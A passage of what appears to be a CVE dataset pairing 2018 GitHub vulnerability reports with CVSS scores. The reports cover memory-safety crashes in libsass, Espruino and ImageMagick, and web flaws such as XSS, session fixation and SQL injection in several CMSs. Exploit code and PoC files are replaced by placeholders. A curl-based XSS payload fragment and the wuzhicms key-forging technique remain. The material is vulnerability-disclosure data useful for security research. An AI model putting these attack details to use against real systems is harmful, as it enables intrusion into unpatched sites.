        "description": "Some bugs in CMS. There are some bugs in the latest commit of CMS. Some of the bugs could be exploited to execute code. one of the debug info as follows: ===== Program received signal SIGSEGV, Segmentation fault. [ stack NUMBERTAG fffffffe NUMBERTAG ffff7b NUMBERTAG c2c APITAG mov r NUMBERTAG QWORD PTR [rb NUMBERTAG fffffffe NUMBERTAG c NUMBERTAG fffffffe NUMBERTAG b NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG e NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffff NUMBERTAG in NUMBERTAG ffff NUMBERTAG in NUMBERTAG ffff7b NUMBERTAG c2c in APITAG (p NUMBERTAG in NUMBERTAG e NUMBERTAG out NUMBERTAG APITAG APITAG Stride NUMBERTAG fffffffe NUMBERTAG at PATHTAG NUMBERTAG ffff7b NUMBERTAG in APITAG APITAG APITAG APITAG APITAG at ../. PATHTAG NUMBERTAG ac7 in APITAG APITAG out NUMBERTAG d0, in=<optimized out>, APITAG at PATHTAG NUMBERTAG APITAG APITAG out>, out=<optimized out>, in=<optimized out>) at PATHTAG NUMBERTAG main (argc=argc APITAG APITAG at PATHTAG NUMBERTAG ffff NUMBERTAG fe NUMBERTAG in __libc_start_main (main NUMBERTAG APITAG , argc NUMBERTAG arg NUMBERTAG fffffffeba8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffeb NUMBERTAG at PATHTAG NUMBERTAG e NUMBERTAG in _start () __main NUMBERTAG APITAG GDB NUMBERTAG may not support required Python API Description: Segmentation fault on program counter Short description: APITAG NUMBERTAG Hash: APITAG Exploitability Classification: EXPLOITABLE Explanation: The target tried to access data at an address that matches the program counter. This is likely due to the execution of a branch instruction (ex: 'call') with a bad argument, but it could also be due to execution continuing past the end of a memory region or another cause. Regardless this likely indicates that the program counter contents are tainted and can be contro lled by an attacker. Other tags: APITAG NUMBERTAG the commit have been tested is APITAG please see the following url for the bugs info and POCs: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-11571",
        "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/486",
        "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/486",
        "Repo_new": "clippercms/clippercms",
        "Issue_Created_At": "2018-05-30T10:58:15Z",
        "description": "Session Fixation. Clipper CMS NUMBERTAG is vulnerable to session fixation attack. APITAG Session Fixation attack fixes an established session on the victim's browser, so the attack starts before the user logs in. APITAG Fixation is an attack that permits an attacker to hijack a valid user session. The attack explores a limitation in the way the web application manages the session ID, more specifically the vulnerable web application. APITAG authenticating a user, it doesn\u2019t assign a new session ID, making it possible to use an existent session ID. APITAG attack consists of obtaining a valid session ID (e.g. by connecting to the application), inducing a user to authenticate himself with that session ID, and then hijacking the user validated session by the knowledge of the used session ID. The attacker has to provide a legitimate Web application session ID and try to make the victim's browser use it. Let's see the session values before login FILETAG FILETAG Session Values after Login FILETAG FILETAG Mitigation: APITAG ID must be renewed after authentication (i.e) session must be different before authentication and after authentication. APITAG application should not accept user supplied cookie value (i.e)session value.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11572",
        "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/485",
        "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/485",
        "Repo_new": "clippercms/clippercms",
        "Issue_Created_At": "2018-05-30T10:45:35Z",
        "description": "Stored XSS in Module name field. Stored XSS is found in the APITAG name\" field in CMS Clipper NUMBERTAG APITAG module name value is obtained from the user,it is getting saved and displayed without any sanitation. Affected URL: URLTAG Steps to reproduce: APITAG Modules choose Manage modules >edit APITAG the XSS payload in APITAG name field and save it. APITAG script is getting executed and results in stored cross site scripting attack. For your reference: FILETAG FILETAG FILETAG FILETAG Mitigation: Strong Input validation has to be performed for all the entry APITAG encode all dynamic data before embedding it in the web page. Encoding should be context sensitive. URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-11575",
        "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/4",
        "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/4",
        "Repo_new": "miniupnp/ngiflib",
        "Issue_Created_At": "2018-05-30T09:47:48Z",
        "description": "stack buffer overflow ngiflib c NUMBERTAG asan report ERRORTAG poc: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11576",
        "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/6",
        "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/6",
        "Repo_new": "miniupnp/ngiflib",
        "Issue_Created_At": "2018-05-30T09:50:09Z",
        "description": "heap buffer overflow ngiflib c NUMBERTAG asan report ERRORTAG poc: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11577",
        "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/582",
        "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/582",
        "Repo_new": "liblouis/liblouis",
        "Issue_Created_At": "2018-05-30T09:52:20Z",
        "description": "SEGV logging c NUMBERTAG asan report ERRORTAG poc: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11578",
        "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/5",
        "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/5",
        "Repo_new": "miniupnp/ngiflib",
        "Issue_Created_At": "2018-05-30T09:48:58Z",
        "description": "SEGV ngiflib c NUMBERTAG asan report ERRORTAG poc: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11590",
        "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1427",
        "Issue_Url_new": "https://github.com/espruino/espruino/issues/1427",
        "Repo_new": "espruino/espruino",
        "Issue_Created_At": "2018-05-19T07:41:46Z",
        "description": "stack over error. We found with our fuzzer a stackoverflow when the input file contains many parentheses. ERRORTAG sample input file: FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-11591",
        "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1420",
        "Issue_Url_new": "https://github.com/espruino/espruino/issues/1420",
        "Repo_new": "espruino/espruino",
        "Issue_Created_At": "2018-05-18T05:53:47Z",
        "description": "Invalid read on APITAG We found with our fuzzer on Linu NUMBERTAG bit an invalid read error on a null pointer in APITAG APITAG It seems that it results from a failed sanity check on array buffer. Address sanitizer output: ERRORTAG crash input files: FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-11592",
        "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1421",
        "Issue_Url_new": "https://github.com/espruino/espruino/issues/1421",
        "Repo_new": "espruino/espruino",
        "Issue_Created_At": "2018-05-18T05:59:01Z",
        "description": "Invalid read on APITAG We found with our fuzzer multiple invalid read errors in APITAG APITAG Asan results are like: ERRORTAG crash input files: FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-11593",
        "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1426",
        "Issue_Url_new": "https://github.com/espruino/espruino/issues/1426",
        "Repo_new": "espruino/espruino",
        "Issue_Created_At": "2018-05-19T07:29:01Z",
        "description": "stack buffer overflows during exception handling. We found with our fuzzer some stack buffer overflows during error handling. ERRORTAG sampe input files: FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-11594",
        "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1434",
        "Issue_Url_new": "https://github.com/espruino/espruino/issues/1434",
        "Repo_new": "espruino/espruino",
        "Issue_Created_At": "2018-05-21T13:06:46Z",
        "description": "Stack overflow error. We found another stack overflow error on APITAG that is different from NUMBERTAG The input file is rather contrived (due to fuzzing) but it can be triggered without address sanitizer. sample input file: FILETAG gdb backtrace: ERRORTAG gdb backtrace file (full): FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-11595",
        "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1425",
        "Issue_Url_new": "https://github.com/espruino/espruino/issues/1425",
        "Repo_new": "espruino/espruino",
        "Issue_Created_At": "2018-05-19T06:56:46Z",
        "description": "multiple stack buffer overflows inside jslex parsing. We found with our fuzzer several buffer overflow errors that can be triggered with address sanitizer. Please see the following for details.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-11596",
        "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1435",
        "Issue_Url_new": "https://github.com/espruino/espruino/issues/1435",
        "Repo_new": "espruino/espruino",
        "Issue_Created_At": "2018-05-21T14:20:24Z",
        "description": "stack buffer over flow inside APITAG We found some buffer overflows against commit APITAG in APITAG APITAG with address sanitizer. Till now, all these crashes involve the arrow function parsing. We haven't digged into the root cause yet, but we reduced the test input as: APITAG The error output is like: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-11597",
        "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1448",
        "Issue_Url_new": "https://github.com/espruino/espruino/issues/1448",
        "Repo_new": "espruino/espruino",
        "Issue_Created_At": "2018-05-27T06:39:27Z",
        "description": "Stack over flow error with certain number of \"{\" in input file. When there are certain number of continuous \"{\" inside input file, it may cause some stackoverflows. For example, on my machine APITAG NUMBERTAG when compiled with address sanitizer, espruino emits stack overflow when there are NUMBERTAG continuous \"{\" in the input files. This was actually observed by our fuzzer in Espruino's older versions several times, but we didn't reproduce with vanilla address sanitizer. We wrote the following simple script to generate the input and finally reproduced it on APITAG CODETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-11598",
        "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1437",
        "Issue_Url_new": "https://github.com/espruino/espruino/issues/1437",
        "Repo_new": "espruino/espruino",
        "Issue_Created_At": "2018-05-22T09:46:38Z",
        "description": "Different errors in APITAG We found with our fuzzer several different errors relevant to calculation of APITAG when calling APITAG in jsvar.c. We tested on ce NUMBERTAG but also reproduced them in APITAG and these errors can be triggered in a normal run without address sanitizer. FILETAG This leads to an invalid read. ERRORTAG FILETAG This leads to an infinite loop. FILETAG This calculates a weird pointer address. ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-11625",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1156",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1156",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-05-30T07:36:02Z",
        "description": "heap buffer overflow in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Version: APITAG NUMBERTAG Q NUMBERTAG It will cause heap overflow when convert the POC to other APITAG Steps to Reproduce ERRORTAG POC FILETAG System Configuration APITAG version: APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on):ubuntu NUMBERTAG Additional information: Credit: Zongming Wang from Chengdu Security Response Center of Qihoo NUMBERTAG Technology Co. Ltd.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11627",
        "Issue_Url_old": "https://github.com/sinatra/sinatra/issues/1428",
        "Issue_Url_new": "https://github.com/sinatra/sinatra/issues/1428",
        "Repo_new": "sinatra/sinatra",
        "Issue_Created_At": "2018-05-22T08:59:02Z",
        "description": "XSS from params parser exception (status code NUMBERTAG source at : URLTAG def params super rescue ERRORTAG ERRORTAG => e raise APITAG APITAG query parameters: {e.message}\" end demo code server.rb require 'sinatra' yes ... it empty just require sinatra gem call curl like curl i ' URLTAG data $'\" %x\\ > APITAG alert NUMBERTAG APITAG \"' return HTTP NUMBERTAG Bad Request Content Type: text/html;charset=utf NUMBERTAG SS Protection NUMBERTAG mode=block X Content Type Options: nosniff X Frame Options: SAMEORIGIN Content Length NUMBERTAG Invalid query parameters: invalid % encoding (\" %x > APITAG alert NUMBERTAG APITAG \") I know it NUMBERTAG but the error message can be HTML ...",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11655",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/930",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/930",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-01-04T07:51:35Z",
        "description": "memory leaks in APITAG INFO Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Delegates (built in): bzlib djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png tiff webp wmf x xml zlib Trigger Command: PATHTAG APITAG memory leaks /dev/null ASAN OUTPUT ERRORTAG testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11656",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/931",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/931",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-01-04T07:55:45Z",
        "description": "memory leaks in APITAG INFO Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Delegates (built in): bzlib djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png tiff webp wmf x xml zlib Trigger Command: PATHTAG APITAG memory leaks /dev/null ASAN OUTPUT ERRORTAG testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11657",
        "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/7",
        "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/7",
        "Repo_new": "miniupnp/ngiflib",
        "Issue_Created_At": "2018-06-01T03:49:40Z",
        "description": "dos an infinite loop ngiflib c NUMBERTAG in APITAG APITAG has an infinite loop if id dont match any case ,it wont break poc: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11670",
        "Issue_Url_old": "https://github.com/GreenCMS/GreenCMS/issues/108",
        "Issue_Url_new": "https://github.com/greencms/greencms/issues/108",
        "Repo_new": "greencms/greencms",
        "Issue_Created_At": "2018-06-01T14:52:13Z",
        "description": "APITAG APITAG \u4ece\u800c\u83b7\u53d6\u7f51\u7ad9webshell \u5229\u7528\u4ee3\u7801 exp\u4ee3\u7801\u5982\u4e0b\uff1a CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11671",
        "Issue_Url_old": "https://github.com/GreenCMS/GreenCMS/issues/109",
        "Issue_Url_new": "https://github.com/greencms/greencms/issues/109",
        "Repo_new": "greencms/greencms",
        "Issue_Created_At": "2018-06-01T14:53:42Z",
        "description": "APITAG APITAG \u5229\u7528\u4ee3\u7801 exp\u4ee3\u7801\u5982\u4e0b\uff1a CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11683",
        "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/591",
        "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/591",
        "Repo_new": "liblouis/liblouis",
        "Issue_Created_At": "2018-06-01T23:07:42Z",
        "description": "ASAn stack based buffer overflow in APITAG line NUMBERTAG in APITAG FILETAG Tested commit: APITAG Credit: Henri Salo Tools: american fuzzy lop URLTAG NUMBERTAG b, afl utils URLTAG Thanks to Kapsi internet k\u00e4ytt\u00e4j\u00e4t ry for providing valuable fuzzing resources. ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11684",
        "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/592",
        "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/592",
        "Repo_new": "liblouis/liblouis",
        "Issue_Created_At": "2018-06-01T23:59:33Z",
        "description": "ASAn stack based buffer overflow in APITAG in line NUMBERTAG in APITAG FILETAG Tested commit: APITAG Credit: Henri Salo Tools: american fuzzy lop URLTAG NUMBERTAG b, afl utils URLTAG Thanks to Kapsi internet k\u00e4ytt\u00e4j\u00e4t ry for providing valuable fuzzing resources. ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11685",
        "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/593",
        "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/593",
        "Repo_new": "liblouis/liblouis",
        "Issue_Created_At": "2018-06-02T11:14:59Z",
        "description": "ASAn stack based buffer overflow in APITAG in NUMBERTAG in APITAG FILETAG Tested commit: APITAG Credit: Henri Salo Tools: american fuzzy lop URLTAG NUMBERTAG b, afl utils URLTAG Thanks to Kapsi internet k\u00e4ytt\u00e4j\u00e4t ry for providing valuable fuzzing resources. ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11693",
        "Issue_Url_old": "https://github.com/sass/libsass/issues/2661",
        "Issue_Url_new": "https://github.com/sass/libsass/issues/2661",
        "Repo_new": "sass/libsass",
        "Issue_Created_At": "2018-06-03T01:41:59Z",
        "description": "APITAG heap buffer overflow (OOB read) in APITAG ( PATHTAG ). Hey there, I have discovered a single byte out of bands read (OOB) in libsass at: APITAG URLTAG Found when fuzzing commit APITAG of libsass, using commit aa6d5c6 URLTAG of sassc as a harness. Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in libsass releases from FILETAG until the commit listed above. You can find a collection of APITAG files that trigger the bug FILETAG . The full ASAN report is shown below: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11695",
        "Issue_Url_old": "https://github.com/sass/libsass/issues/2664",
        "Issue_Url_new": "https://github.com/sass/libsass/issues/2664",
        "Repo_new": "sass/libsass",
        "Issue_Created_At": "2018-06-03T02:31:46Z",
        "description": "APITAG null pointer dereference (SEGV) in APITAG ( PATHTAG ). Hey there, I have discovered a null pointer dereference in libsass at: APITAG URLTAG Found when fuzzing commit APITAG of libsass, using commit aa6d5c6 URLTAG of sassc as a harness. Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in libsass releases from FILETAG through to FILETAG and then re introduced in the commit APITAG You can find a collection of APITAG files that trigger the bug FILETAG . The full ASAN report is shown below: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11696",
        "Issue_Url_old": "https://github.com/sass/libsass/issues/2665",
        "Issue_Url_new": "https://github.com/sass/libsass/issues/2665",
        "Repo_new": "sass/libsass",
        "Issue_Created_At": "2018-06-03T02:39:40Z",
        "description": "APITAG null pointer dereference (SEGV) in APITAG ( PATHTAG ). Hey there, I have discovered a null pointer dereference in libsass at: APITAG URLTAG Found when fuzzing commit APITAG of libsass, using commit aa6d5c6 URLTAG of sassc as a harness. Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in libsass releases from FILETAG until the commit fuzzed APITAG You can find a collection of APITAG files that trigger the bug FILETAG The full ASAN report is shown below: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11697",
        "Issue_Url_old": "https://github.com/sass/libsass/issues/2656",
        "Issue_Url_new": "https://github.com/sass/libsass/issues/2656",
        "Repo_new": "sass/libsass",
        "Issue_Created_At": "2018-06-02T00:13:09Z",
        "description": "APITAG heap buffer overflow (OOB read) in APITAG ( PATHTAG ). Hey there, I have discovered an out of bands read (OOB) in libsass at: PATHTAG URLTAG Found when fuzzing commit APITAG of libsass, using commit aa6d5c6 URLTAG of sassc as a harness. Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in libsass releases from NUMBERTAG to NUMBERTAG and the most recent HEAD. You can find a collection of APITAG files that trigger the bug FILETAG . The full ASAN report can be found FILETAG (symbols names too long to bother showing). ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11698",
        "Issue_Url_old": "https://github.com/sass/libsass/issues/2662",
        "Issue_Url_new": "https://github.com/sass/libsass/issues/2662",
        "Repo_new": "sass/libsass",
        "Issue_Created_At": "2018-06-03T01:54:30Z",
        "description": "APITAG heap buffer overflow (OOB read) in Sass::handle_error ( PATHTAG ). Hey there, I have discovered a single byte out of bands read (OOB) in libsass at: APITAG URLTAG Found when fuzzing commit APITAG of libsass, using commit aa6d5c6 URLTAG of sassc as a harness. Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in libsass releases from FILETAG until the commit listed above. You can find a collection of APITAG files that trigger the bug FILETAG . The full ASAN report is shown below: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11722",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/141",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/141",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-06-04T03:09:01Z",
        "description": "wuzhicms FILETAG SQL Injection Vulnerability. wuzhicms FILETAG SQL Injection Vulnerability ========================== Advisory: wuzhicms FILETAG SQL Injection Vulnerability Author: snake.jin MENTIONTAG Affected Version: Latest NUMBERTAG ulnerability Description Recetly, I found an SQL Injection Vulnerability in 'wuzhicms' because of the hard coded 'UC_KEY'. Vulnerable cgi: FILETAG ERRORTAG As the code above, if we know the UC_KEY, we can decode all the $get parameters, and the 'username' parameter causes a sql injection. Fortunately in the latest version the UC_KEY is hard coded as 'uc_key' => APITAG So we can use the code below to calculate the 'code' value: CODETAG ========================== POC && EXP URLTAG APITAG parameter 'code' value depends on the web server time. FILETAG Just enjoy it!",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11734",
        "Issue_Url_old": "https://github.com/e107inc/e107/issues/3170",
        "Issue_Url_new": "https://github.com/e107inc/e107/issues/3170",
        "Repo_new": "e107inc/e107",
        "Issue_Created_At": "2018-06-04T04:45:19Z",
        "description": "Output without filtering results in xss filtering. Website Background article insert payload FILETAG front end FILETAG Packet capture found no httponly FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11736",
        "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/61",
        "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/61",
        "Repo_new": "pluck-cms/pluck",
        "Issue_Created_At": "2018-05-31T04:15:42Z",
        "description": "File upload vuln APITAG An issue was discovered in Pluck before NUMBERTAG Remote PHP code execution is possible. Do you hava a email? I send details to it.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-11737",
        "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/1266",
        "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/1266",
        "Repo_new": "sleuthkit/sleuthkit",
        "Issue_Created_At": "2018-06-03T13:32:43Z",
        "description": "APITAG out of bounds unmapped memory access in ntfs_fix_idxrec ( PATHTAG ). Hey there, I have discovered an unmapped memory access in the sleuth kit at: APITAG URLTAG Found when fuzzing commit APITAG Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in sleuth kit releases from FILETAG up until and including the latest release FILETAG You can find a POC that triggers the bug FILETAG . The full ASAN report is shown below: ERRORTAG",
